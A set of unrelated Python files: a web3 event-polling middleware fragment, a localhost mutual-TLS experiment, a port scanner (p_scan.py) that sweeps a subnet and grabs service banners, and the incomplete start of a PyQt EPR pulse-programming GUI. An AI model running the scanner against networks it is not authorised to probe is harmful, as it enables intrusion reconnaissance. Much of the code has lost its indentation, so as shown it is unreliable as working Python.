self.last_block = latest.hash
self.last_block_seen = latest.timestamp
        self.last_request = 0.0
self.event_cache: OrderedDict = OrderedDict()
self.event_filter = w3.eth.filter({"topics": []})
self.lock = threading.Lock()
self.event = threading.Event()
self.is_killed = False
self.active_project = project.get_loaded_projects()[0]
threading.Thread(target=self.event_filter_loop, daemon=True).start()
@classmethod
def get_layer(cls, w3: Web3, network_type: str) -> Optional[int]:
return 0
def get_contract_by_address(self, address):
return get_contract_by_address(self.active_project, address)
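    # Background polling thread: repeatedly drain the catch-all log filter, pretty-print any
    # Message(string) events, and back off when the middleware has been idle for a while.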
def event_filter_loop(self) -> None:
n = 0
while not self.is_killed:
n += 1
#print_y(f"===>event_filter_loop {n}")
            # if the last RPC request was more than `request_duty` seconds ago, reduce the rate
            # of updates: the wait grows with idle time but is capped at `request_duty` seconds.
with self.lock:
# print('----> lock 11')
if self.time_since > request_duty:
self.event_cache.clear()
self.event.clear()
if self.time_since > request_duty:
self.event.wait(min(self.time_since / 10, request_duty))
# query the filter for new blocks
with self.lock:
# print('----> lock 12')
                # fetch any new log entries from the filter
try:
new_events = self.event_filter.get_new_entries()
except (AttributeError, ValueError):
# web3 has disconnected, or the filter has expired from inactivity
if self.w3.isConnected():
self.event_filter = self.w3.eth.filter({"topics": []})
continue
else:
return
                # if new log entries were fetched successfully
if new_events:
for event in new_events:
if CONFIG.settings.get("show_all_events"):
print_r(f"\n---->event:{event}" )
parse_log(self.w3, event)
# contract_address = event["address"]
# _contract = self.get_contract_by_address(contract_address)
# if _contract:
# tx_hash = event["transactionHash"]
# receipt = self.w3.eth.get_transaction_receipt(tx_hash)
# # print('---->get_contract success')
# contract = self.w3.eth.contract(
# address=_contract.address, abi=_contract.abi
# )
# # contract = self.w3.eth.contract(abi=_contract.abi)
# message_event = contract.events.Message()
# # print("====>message_event:", message_event)
# processed_logs = message_event.processReceipt(receipt)
# if CONFIG.settings.get("show_parsed_events"):
# print("\n---->parsed event:", processed_logs)
# for log in processed_logs:
# try:
# print("\n---->msg:", log["args"]["msg"])
# except Exception as e:
# print("parse msg error\n", e)
if new_events and self.time_since < 15:
# if this update found a new block and we've been querying
# frequently, we can wait a few seconds before the next update
time.sleep(5)
elif time.time() - self.last_block_seen < 15:
# if it's been less than 15 seconds since the last block, wait 2 seconds
time.sleep(2)
else:
# if it's been more than 15 seconds, only wait 1 second
time.sleep(1)
@property
def time_since(self) -> float:
return time.time() - self.last_request
def process_request(self, make_request: Callable, method: str, params: List) -> Dict:
result = make_request(method, params)
if method in ("eth_call", "eth_estimateGas"):
if "error" in result:
raise ValueError(result["error"])
return result
def uninstall(self) -> None:
self.is_killed = True
if self.w3.isConnected():
self.w3.eth.uninstallFilter(self.event_filter.filter_id)
|
experiment.py
|
#!/usr/bin/python3
import os
import socket
import ssl
import threading
import time
hostname = '127.0.0.1'
port = 40000
thisdir = os.path.dirname(os.path.realpath(__file__))
CA_FOLDER = thisdir + '/ca-rsa'
CLIENT_FOLDER = thisdir + '/client-rsa'
SERVER_FOLDER = thisdir + '/server-rsa'
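# Mutual-TLS echo experiment: the server requires a client certificate signed by the test CA
# and reads from the client until it closes the connection.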
def server_thread():
#srvctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
srvctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
srvctx.verify_mode = ssl.CERT_REQUIRED
srvctx.load_cert_chain(
SERVER_FOLDER + '/server.crt', SERVER_FOLDER + '/server.key')
srvctx.load_verify_locations(CA_FOLDER + '/CA.Root.pem')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
sock.bind((hostname, port))
sock.listen(5)
while True:
print('waiting for client')
newsock, addr = sock.accept()
print("Client connected: {}:{}".format(addr[0], addr[1]))
with srvctx.wrap_socket(newsock, server_side=True) as ssock:
print("SSL established. Peer: {}".format(ssock.getpeercert()))
buf = b'' # Buffer to hold received client data
try:
while True:
data = ssock.recv(4096)
if data:
# Client sent us data. Append to buffer
buf += data
else:
# No more data from client. Show buffer and close connection.
print("Received:", buf)
break
finally:
print("Closing connection")
ssock.shutdown(socket.SHUT_RDWR)
ssock.close()
def client_thread():
# PROTOCOL_TLS_CLIENT requires valid cert chain and hostname
#cltctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
#cltctx.load_verify_locations(CLIENT_FOLDER + '/client.crt')
cltctx = ssl.create_default_context(
ssl.Purpose.SERVER_AUTH)
# ssl.Purpose.SERVER_AUTH, cafile=SERVER_FOLDER + '/server.crt')
cltctx.load_cert_chain(certfile=CLIENT_FOLDER + '/client.crt',
keyfile=CLIENT_FOLDER + '/client.key')
cltctx.load_verify_locations(CA_FOLDER + '/CA.Root.pem')
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
with cltctx.wrap_socket(sock, server_side=False, server_hostname=hostname) as ssock:
            # connect (which performs the TLS handshake) before querying the negotiated version
            ssock.connect((hostname, port))
            print(ssock.version())
print("SSL established. Peer: {}".format(ssock.getpeercert()))
            print("Sending: 'Hello, world!'")
ssock.send(b"Hello, world!")
print("Closing connection")
ssock.close()
def main():
print('Starting!')
srv = threading.Thread(target=server_thread, name='SERVER')
clt = threading.Thread(target=client_thread, name='CLIENT')
srv.start()
time.sleep(1)
clt.start()
clt.join()
srv.join()
main()
|
p_scan.py
|
#!/usr/bin/python
#@syntax
# network/mask port_range (timeout)
# ex. p_scan.py 192.168.1.0/24 20-1024 (20)
import socket
import sys
from math import floor, ceil
from multiprocessing import Process, Queue
def find_next_host(last_host_ip):
    # Increment the host IP (a list of four octet ints) in place, rolling octets
    # that reach 255 over to 0 and carrying into the next octet to the left.
    s = 3
    tmp_host_func = last_host_ip
    while s >= 0:
        if (tmp_host_func[s] == 255):
            tmp_host_func[s] = 0
            s -= 1
        else:
            tmp_host_func[s] = tmp_host_func[s] + 1
            return tmp_host_func
    return tmp_host_func
def port_check(host,port_start,port_end,timeout,return_queue):
    for port in range(port_start,port_end+1):
        try:
            # A socket cannot be reused after connect()/close(), so create a fresh one per probe.
            s = socket.socket()
            s.settimeout(timeout)
            s.connect((host,port))
            s.send(b'.')
            banner = s.recv(1024)
            s.close()
            if banner:
                return_queue.put((host,port))
            #Want a nice print, uncomment
            #print ('[+] Port '+str(port)+' open at '+host+' '+str(banner))
        except Exception as e:
            pass
def main():
try:
ip_range = sys.argv[1]
port_range = sys.argv[2]
except:
print ("Syntax Error")
print ("Correct syntax : ip_range port_range")
print ("ex. p_scan.py 192.168.1.0/24 20-1024")
sys.exit()
try:
timeout = int(sys.argv[3])
except:
timeout = 20
ip_split = ip_range.split('/')
    if (len(ip_split) != 2):
print ("Syntax Error \n")
print ("Correct syntax : network/mask port_range \n")
print ("ex. p_scan.py 192.168.1.0/24 20-1024")
sys.exit()
port_split = port_range.split('-')
    if (len(port_split) != 2):
print ("Syntax Error \n")
print ("Correct syntax : network/mask port_range \n")
print ("ex. p_scan.py 192.168.1.0/24 20-1024")
sys.exit()
port_start = port_split[0]
port_end = port_split[1]
try:
port_start = int(port_start)
port_end = int(port_end)
if (port_start > port_end):
raise
except:
print("Port not an integer or wrong port syntax")
sys.exit()
network = ip_split[0]
try:
mask = int(ip_split[1])
if (mask > 32):
raise
except:
print("Network mask is not an Integer or is greater than 32")
sys.exit()
network_dotted = network.split('.')
    if (len(network_dotted) != 4):
        print("Wrong IP formatting")
sys.exit()
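    # Convert each octet to a padded 8-bit binary list so the network base address
    # can be rebuilt bit by bit according to the mask.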
i = 0
try:
for ip_part in network_dotted:
network_dotted[i] = int(ip_part)
if (network_dotted[i] > 255):
raise
network_dotted[i] = bin(network_dotted[i])
network_dotted[i] = list(network_dotted[i][2:])
i += 1
    except:
        print ("Wrong IP formatting")
        sys.exit()
network_base = []
for ip_part in network_dotted:
for k in range(len(ip_part),8):
ip_part[0:0] = ['0']
for j in range(0,int(floor(mask/8))):
network_base.append(network_dotted[j])
if (mask%8 != 0):
network_base.append(network_dotted[j+1][:(mask%8)] + ['0'] *(8-(mask%8)))
for j in range(int(ceil(mask/8)),4):
network_base.append((['0']*8))
network_base[3][7] = '1'
ip_base_parts = []
for ip_part in network_base:
ip_part[0:0] = ['0','b']
ip_base_parts.append(''.join(ip_part))
for j in range(0,4):
ip_base_parts[j] = int(ip_base_parts[j],2)
hosts = (2**(32 - mask)) - 2
hosts_to_scan = []
last_host_ip = ip_base_parts
host_tmp = []
for j in range(0,4):
host_tmp.append(str(ip_base_parts[j]))
hosts_to_scan.append('.'.join(host_tmp))
for j in range(0,hosts-1):
host_tmp = []
last_host = find_next_host(last_host_ip)
for j in range(0,4):
host_tmp.append(str(last_host[j]))
hosts_to_scan.append('.'.join(host_tmp))
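    # One scanning process per host; each worker probes the whole port range and reports
    # responding ports as (host, port) tuples on the shared queue.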
jobs = []
q = Queue()
for host_ip in hosts_to_scan:
proc = Process(target=port_check,args=(host_ip,port_start,port_end,timeout,q))
jobs.append(proc)
for j in jobs:
j.start()
for j in jobs:
j.join()
for i in range(0,q.qsize()):
pr = q.get()
#You can do more stuff with pr
print (pr)
#Start Here!
if __name__ == "__main__":
main()
|
pulse_creator.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import time
from multiprocessing import Process, Pipe
#from PyQt5.QtWidgets import QListView, QAction, QWidget
from PyQt5.QtWidgets import QFileDialog
from PyQt5 import QtWidgets, uic #, QtCore, QtGui
from PyQt5.QtGui import QIcon
import atomize.general_modules.general_functions as general
import atomize.device_modules.PB_ESR_500_pro as pb_pro
import atomize.device_modules.BH_15 as bh
class MainWindow(QtWidgets.QMainWindow):
"""
A main window class
"""
def __init__(self, *args, **kwargs):
"""
A function for connecting actions and creating a main window
"""
super(MainWindow, self).__init__(*args, **kwargs)
path_to_main = os.path.dirname(os.path.abspath(__file__))
gui_path = os.path.join(path_to_main,'gui/pulse_main_window.ui')
icon_path = os.path.join(path_to_main, 'gui/icon_pulse.png')
self.setWindowIcon( QIcon(icon_path) )
self.path = os.path.join(path_to_main, '..', 'tests/pulse_epr')
self.destroyed.connect(lambda: self._on_destroyed()) # connect some actions to exit
# Load the UI Page
uic.loadUi(gui_path, self) # Design file
self.pb = pb_pro.PB_ESR_500_Pro()
self.bh15 = bh.BH_15()
# First initialization problem
# corrected directly in the module BH-15
#try:
#self.bh15.magnet_setup( 3500, 0.5 )
#except BrokenPipeError:
# pass
# Connection of different action to different Menus and Buttons
self.button_off.clicked.connect(self.turn_off)
self.button_off.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_stop.clicked.connect(self.stop)
self.button_stop.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_update.clicked.connect(self.update)
self.button_update.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
# text labels
self.errors.setStyleSheet("QPlainTextEdit { color : rgb(211, 194, 78); }") # rgb(193, 202, 227)
self.label.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_2.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_3.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_4.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_5.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_6.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
# Spinboxes
self.P1_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P1_st.lineEdit().setReadOnly( True ) # block input from keyboard
self.P2_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P2_st.lineEdit().setReadOnly( True )
self.P3_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P3_st.lineEdit().setReadOnly( True )
self.P4_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P4_st.lineEdit().setReadOnly( True )
self.P5_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P5_st.lineEdit().setReadOnly( True )
self.P6_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P6_st.lineEdit().setReadOnly( True )
self.P7_st.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P7_st.lineEdit().setReadOnly( True )
self.Rep_rate.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
self.Field.setStyleSheet("QDoubleSpinBox { color : rgb(193, 202, 227); }")
self.P1_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P1_len.lineEdit().setReadOnly( True )
self.P2_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P2_len.lineEdit().setReadOnly( True )
self.P3_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P3_len.lineEdit().setReadOnly( True )
self.P4_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P4_len.lineEdit().setReadOnly( True )
self.P5_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P5_len.lineEdit().setReadOnly( True )
self.P6_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P6_len.lineEdit().setReadOnly( True )
self.P7_len.setStyleSheet("QSpinBox { color : rgb(193, 202, 227); }")
#self.P7_len.lineEdit().setReadOnly( True )
self.P1_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P2_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P3_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P4_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P5_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P6_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.P7_type.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_1.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_2.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_3.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_4.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_5.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_6.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.Phase_7.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
# Functions
self.P1_st.valueChanged.connect(self.p1_st)
self.p1_start = self.add_ns( self.P1_st.value() )
self.P2_st.valueChanged.connect(self.p2_st)
self.p2_start = self.add_ns( self.P2_st.value() )
self.P3_st.valueChanged.connect(self.p3_st)
self.p3_start = self.add_ns( self.P3_st.value() )
self.P4_st.valueChanged.connect(self.p4_st)
self.p4_start = self.add_ns( self.P4_st.value() )
self.P5_st.valueChanged.connect(self.p5_st)
self.p5_start = self.add_ns( self.P5_st.value() )
self.P6_st.valueChanged.connect(self.p6_st)
self.p6_start = self.add_ns( self.P6_st.value() )
self.P7_st.valueChanged.connect(self.p7_st)
self.p7_start = self.add_ns( self.P7_st.value() )
self.P1_len.valueChanged.connect(self.p1_len)
self.p1_length = self.add_ns( self.P1_len.value() )
self.P2_len.valueChanged.connect(self.p2_len)
self.p2_length = self.add_ns( self.P2_len.value() )
self.P3_len.valueChanged.connect(self.p3_len)
self.p3_length = self.add_ns( self.P3_len.value() )
self.P4_len.valueChanged.connect(self.p4_len)
self.p4_length = self.add_ns( self.P4_len.value() )
self.P5_len.valueChanged.connect(self.p5_len)
self.p5_length = self.add_ns( self.P5_len.value() )
self.P6_len.valueChanged.connect(self.p6_len)
self.p6_length = self.add_ns( self.P6_len.value() )
self.P7_len.valueChanged.connect(self.p7_len)
self.p7_length = self.add_ns( self.P7_len.value() )
self.Rep_rate.valueChanged.connect(self.rep_rate)
self.repetition_rate = str( self.Rep_rate.value() ) + ' Hz'
self.Field.valueChanged.connect(self.field)
self.mag_field = float( self.Field.value() )
self.bh15.magnet_setup( self.mag_field, 0.5 )
self.P1_type.currentIndexChanged.connect(self.p1_type)
self.p1_typ = str( self.P1_type.currentText() )
self.P2_type.currentIndexChanged.connect(self.p2_type)
self.p2_typ = str( self.P2_type.currentText() )
self.P3_type.currentIndexChanged.connect(self.p3_type)
self.p3_typ = str( self.P3_type.currentText() )
self.P4_type.currentIndexChanged.connect(self.p4_type)
self.p4_typ = str( self.P4_type.currentText() )
self.P5_type.currentIndexChanged.connect(self.p5_type)
self.p5_typ = str( self.P5_type.currentText() )
self.P6_type.currentIndexChanged.connect(self.p6_type)
self.p6_typ = str( self.P6_type.currentText() )
self.P7_type.currentIndexChanged.connect(self.p7_type)
self.p7_typ = str( self.P7_type.currentText() )
self.laser_flag = 0
self.laser_q_switch_delay = 165000 # in ns
self.Phase_1.currentIndexChanged.connect(self.phase_1)
self.ph_1 = self.phase_converted( self.Phase_1.currentText() )
self.Phase_2.currentIndexChanged.connect(self.phase_2)
self.ph_2 = self.phase_converted( self.Phase_2.currentText() )
self.Phase_3.currentIndexChanged.connect(self.phase_3)
self.ph_3 = self.phase_converted( self.Phase_3.currentText() )
self.Phase_4.currentIndexChanged.connect(self.phase_4)
self.ph_4 = self.phase_converted( self.Phase_4.currentText() )
self.Phase_5.currentIndexChanged.connect(self.phase_5)
self.ph_5 = self.phase_converted( self.Phase_5.currentText() )
self.Phase_6.currentIndexChanged.connect(self.phase_6)
self.ph_6 = self.phase_converted( self.Phase_6.currentText() )
self.Phase_7.currentIndexChanged.connect(self.phase_7)
self.ph_7 = self.phase_converted( self.Phase_7.currentText() )
self.menu_bar_file()
def menu_bar_file(self):
"""
Design settings for QMenuBar
"""
self.menuBar.setStyleSheet("QMenuBar { color: rgb(193, 202, 227); } \
QMenu::item { color: rgb(211, 194, 78); } QMenu::item:selected {color: rgb(193, 202, 227); }")
self.action_read.triggered.connect( self.open_file_dialog )
self.action_save.triggered.connect( self.save_file_dialog )
def open_file_dialog(self):
"""
A function to open a new window for choosing a pulse list
"""
filedialog = QFileDialog(self, 'Open File', directory = self.path, filter = "Pulse List (*.pulse)",\
options = QtWidgets.QFileDialog.DontUseNativeDialog)
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.open_file)
filedialog.show()
def save_file_dialog(self):
"""
A function to open a new window for choosing a pulse list
"""
filedialog = QFileDialog(self, 'Save File', directory = self.path, filter = "Pulse List (*.pulse)",\
options = QtWidgets.QFileDialog.DontUseNativeDialog)
filedialog.setAcceptMode(QFileDialog.AcceptSave)
# use QFileDialog.DontUseNativeDialog to change directory
filedialog.setStyleSheet("QWidget { background-color : rgb(42, 42, 64); color: rgb(211, 194, 78);}")
filedialog.setFileMode(QtWidgets.QFileDialog.AnyFile)
filedialog.fileSelected.connect(self.save_file)
filedialog.show()
def open_file(self, filename):
"""
A function to open a pulse list
:param filename: string
"""
text = open(filename).read()
lines = text.split('\n')
self.setter(text, 0, self.P1_type, self.P1_st, self.P1_len, self.Phase_1)
self.setter(text, 1, self.P2_type, self.P2_st, self.P2_len, self.Phase_2)
self.setter(text, 2, self.P3_type, self.P3_st, self.P3_len, self.Phase_3)
self.setter(text, 3, self.P4_type, self.P4_st, self.P4_len, self.Phase_4)
self.setter(text, 4, self.P5_type, self.P5_st, self.P5_len, self.Phase_5)
self.setter(text, 5, self.P6_type, self.P6_st, self.P6_len, self.Phase_6)
self.setter(text, 6, self.P7_type, self.P7_st, self.P7_len, self.Phase_7)
self.Rep_rate.setValue( int( lines[7].split(': ')[1] ) )
self.Field.setValue( float( lines[8].split(': ')[1] ) )
#self.errors.setPlainText( str( text.split('\n')[3].split(', ')[3] ) )
#self.errors.appendPlainText( str( self.p1_start ) + ' ' + str( self.p4_start ) + ' ' + str( self.p7_start ) )
#self.errors.appendPlainText( str( self.p1_length ) + ' ' + str( self.p4_length ) + ' ' + str( self.p7_length ) )
#self.errors.appendPlainText( str( self.p1_typ ) + ' ' + str( self.p4_typ ) + ' ' + str( self.p7_typ ) )
#self.errors.appendPlainText( str( self.ph_1 ) + ' ' + str( self.ph_4 ) + ' ' + str( self.ph_7 ) )
def setter(self, text, index, typ, st, leng, phase):
"""
Auxiliary function to set all the values from *.pulse file
"""
array = text.split('\n')[index].split(': ')[1].split(', ')
typ.setCurrentText( array[0] )
st.setValue( int( array[1] ) )
leng.setValue( int( array[2] ) )
phase.setCurrentText( str( array[3] ) )
def save_file(self, filename):
"""
A function to save a new pulse list
:param filename: string
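        The file stores one line per pulse as '<name>: <channel>, <start>, <length>, <phase>',
        followed by 'Rep rate:' and 'Field:' lines; setter() reads the same layout back in open_file().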
"""
if filename[-5:] != 'pulse':
filename = filename + '.pulse'
with open(filename, 'w') as file:
file.write( 'P1: ' + self.P1_type.currentText() + ', ' + str(self.P1_st.value()) + ', ' + str(self.P1_len.value()) + ', ' + self.Phase_1.currentText() + '\n' )
file.write( 'P2: ' + self.P2_type.currentText() + ', ' + str(self.P2_st.value()) + ', ' + str(self.P2_len.value()) + ', ' + self.Phase_2.currentText() + '\n' )
file.write( 'P3: ' + self.P3_type.currentText() + ', ' + str(self.P3_st.value()) + ', ' + str(self.P3_len.value()) + ', ' + self.Phase_3.currentText() + '\n' )
file.write( 'P4: ' + self.P4_type.currentText() + ', ' + str(self.P4_st.value()) + ', ' + str(self.P4_len.value()) + ', ' + self.Phase_4.currentText() + '\n' )
file.write( 'P5: ' + self.P5_type.currentText() + ', ' + str(self.P5_st.value()) + ', ' + str(self.P5_len.value()) + ', ' + self.Phase_5.currentText() + '\n' )
file.write( 'P6: ' + self.P6_type.currentText() + ', ' + str(self.P6_st.value()) + ', ' + str(self.P6_len.value()) + ', ' + self.Phase_6.currentText() + '\n' )
file.write( 'P7: ' + self.P7_type.currentText() + ', ' + str(self.P7_st.value()) + ', ' + str(self.P7_len.value()) + ', ' + self.Phase_7.currentText() + '\n' )
file.write( 'Rep rate: ' + str(self.Rep_rate.value()) + '\n' )
file.write( 'Field: ' + str(self.Field.value()) + '\n' )
def phase_converted(self, ph_str):
if ph_str == '+x':
return '+x'
elif ph_str == '-x':
return '-x'
elif ph_str == '+y':
return '+y'
elif ph_str == '-y':
return '-y'
def phase_1(self):
"""
A function to change a pulse 1 phase
"""
self.ph_1 = self.phase_converted( self.Phase_1.currentText() )
def phase_2(self):
"""
A function to change a pulse 2 phase
"""
self.ph_2 = self.phase_converted( self.Phase_2.currentText() )
def phase_3(self):
"""
A function to change a pulse 3 phase
"""
self.ph_3 = self.phase_converted( self.Phase_3.currentText() )
def phase_4(self):
"""
A function to change a pulse 4 phase
"""
self.ph_4 = self.phase_converted( self.Phase_4.currentText() )
def phase_5(self):
"""
A function to change a pulse 5 phase
"""
self.ph_5 = self.phase_converted( self.Phase_5.currentText() )
def phase_6(self):
"""
A function to change a pulse 6 phase
"""
self.ph_6 = self.phase_converted( self.Phase_6.currentText() )
def phase_7(self):
"""
A function to change a pulse 7 phase
"""
self.ph_7 = self.phase_converted( self.Phase_7.currentText() )
def remove_ns(self, string1):
return string1.split(' ')[0]
def add_ns(self, string1):
"""
Function to add ' ns'
"""
return str( string1 ) + ' ns'
def check_length(self, length):
self.errors.clear()
if int( length ) != 0 and int( length ) < 12:
            self.errors.appendPlainText( 'Pulse length should be at least 12 ns' )
return length
def _on_destroyed(self):
"""
A function to do some actions when the main window is closing.
"""
self.pb.pulser_stop()
#sys.exit()
def quit(self):
"""
        A function to quit the program
"""
self._on_destroyed()
sys.exit()
def p1_st(self):
"""
A function to set pulse 1 start
"""
self.p1_start = self.P1_st.value()
if self.p1_start % 2 != 0:
self.p1_start = self.p1_start + 1
self.P1_st.setValue( self.p1_start )
self.p1_start = self.add_ns( self.P1_st.value() )
def p2_st(self):
"""
A function to set pulse 2 start
"""
self.p2_start = self.P2_st.value()
if self.p2_start % 2 != 0:
self.p2_start = self.p2_start + 1
self.P2_st.setValue( self.p2_start )
self.p2_start = self.add_ns( self.P2_st.value() )
def p3_st(self):
"""
A function to set pulse 3 start
"""
self.p3_start = self.P3_st.value()
if self.p3_start % 2 != 0:
self.p3_start = self.p3_start + 1
self.P3_st.setValue( self.p3_start )
self.p3_start = self.add_ns( self.P3_st.value() )
def p4_st(self):
"""
A function to set pulse 4 start
"""
self.p4_start = self.P4_st.value()
if self.p4_start % 2 != 0:
self.p4_start = self.p4_start + 1
self.P4_st.setValue( self.p4_start )
self.p4_start = self.add_ns( self.P4_st.value() )
def p5_st(self):
"""
A function to set pulse 5 start
"""
self.p5_start = self.P5_st.value()
if self.p5_start % 2 != 0:
self.p5_start = self.p5_start + 1
self.P5_st.setValue( self.p5_start )
self.p5_start = self.add_ns( self.P5_st.value() )
def p6_st(self):
"""
A function to set pulse 6 start
"""
self.p6_start = self.P6_st.value()
if self.p6_start % 2 != 0:
self.p6_start = self.p6_start + 1
self.P6_st.setValue( self.p6_start )
self.p6_start = self.add_ns( self.P6_st.value() )
def p7_st(self):
"""
A function to set pulse 7 start
"""
self.p7_start = self.P7_st.value()
if self.p7_start % 2 != 0:
self.p7_start = self.p7_start + 1
self.P7_st.setValue( self.p7_start )
self.p7_start = self.add_ns( self.P7_st.value() )
def p1_len(self):
"""
A function to change a pulse 1 length
"""
self.p1_length = self.P1_len.value()
if self.p1_length % 2 != 0:
self.p1_length = self.p1_length + 1
self.P1_len.setValue( self.p1_length )
pl = self.check_length( self.P1_len.value() )
self.p1_length = self.add_ns( pl )
def p2_len(self):
"""
A function to change a pulse 2 length
"""
self.p2_length = self.P2_len.value()
if self.p2_length % 2 != 0:
self.p2_length = self.p2_length + 1
self.P2_len.setValue( self.p2_length )
pl = self.check_length( self.P2_len.value() )
self.p2_length = self.add_ns( pl )
def p3_len(self):
"""
A function to change a pulse 3 length
"""
self.p3_length = self.P3_len.value()
if self.p3_length % 2 != 0:
self.p3_length = self.p3_length + 1
self.P3_len.setValue( self.p3_length )
pl = self.check_length( self.P3_len.value() )
self.p3_length = self.add_ns( pl )
def p4_len(self):
"""
A function to change a pulse 4 length
"""
self.p4_length = self.P4_len.value()
if self.p4_length % 2 != 0:
self.p4_length = self.p4_length + 1
self.P4_len.setValue( self.p4_length )
pl = self.check_length( self.P4_len.value() )
self.p4_length = self.add_ns( pl )
def p5_len(self):
"""
A function to change a pulse 5 length
"""
self.p5_length = self.P5_len.value()
if self.p5_length % 2 != 0:
self.p5_length = self.p5_length + 1
self.P5_len.setValue( self.p5_length )
pl = self.check_length( self.P5_len.value() )
self.p5_length = self.add_ns( pl )
def p6_len(self):
"""
A function to change a pulse 6 length
"""
self.p6_length = self.P6_len.value()
if self.p6_length % 2 != 0:
self.p6_length = self.p6_length + 1
self.P6_len.setValue( self.p6_length )
pl = self.check_length( self.P6_len.value() )
self.p6_length = self.add_ns( pl )
def p7_len(self):
"""
A function to change a pulse 7 length
"""
self.p7_length = self.P7_len.value()
if self.p7_length % 2 != 0:
self.p7_length = self.p7_length + 1
self.P7_len.setValue( self.p7_length )
pl = self.check_length( self.P7_len.value() )
self.p7_length = self.add_ns( pl )
def p1_type(self):
"""
A function to change a pulse 1 type
"""
self.p1_typ = str( self.P1_type.currentText() )
def p2_type(self):
"""
A function to change a pulse 2 type
"""
self.p2_typ = str( self.P2_type.currentText() )
if self.p2_typ == 'LASER':
self.laser_flag = 1
else:
self.laser_flag = 0
def p3_type(self):
"""
A function to change a pulse 3 type
"""
self.p3_typ = str( self.P3_type.currentText() )
def p4_type(self):
"""
A function to change a pulse 4 type
"""
self.p4_typ = str( self.P4_type.currentText() )
def p5_type(self):
"""
A function to change a pulse 5 type
"""
self.p5_typ = str( self.P5_type.currentText() )
def p6_type(self):
"""
A function to change a pulse 6 type
"""
self.p6_typ = str( self.P6_type.currentText() )
def p7_type(self):
"""
A function to change a pulse 7 type
"""
self.p7_typ = str( self.P7_type.currentText() )
def rep_rate(self):
"""
A function to change a repetition rate
"""
self.repetition_rate = str( self.Rep_rate.value() ) + ' Hz'
if self.laser_flag != 1:
self.pb.pulser_repetition_rate( self.repetition_rate )
self.update()
else:
self.repetition_rate = '10 Hz'
self.pb.pulser_repetition_rate( self.repetition_rate )
self.Rep_rate.setValue(10)
#self.update()
            self.errors.appendPlainText( '10 Hz is the maximum repetition rate with a LASER pulse' )
def field(self):
"""
A function to change a magnetic field
"""
self.mag_field = float( self.Field.value() )
self.bh15.magnet_field( self.mag_field )
self.errors.appendPlainText( str( self.mag_field ) )
def stop(self):
"""
A function to clear pulses
"""
self.errors.clear()
self.pb.pulser_stop()
self.pb.pulser_clear()
def pulse_sequence(self):
"""
Pulse sequence from defined pulses
"""
if self.laser_flag != 1:
self.pb.pulser_repetition_rate( self.repetition_rate )
if int( self.p1_length.split(' ')[0] ) != 0:
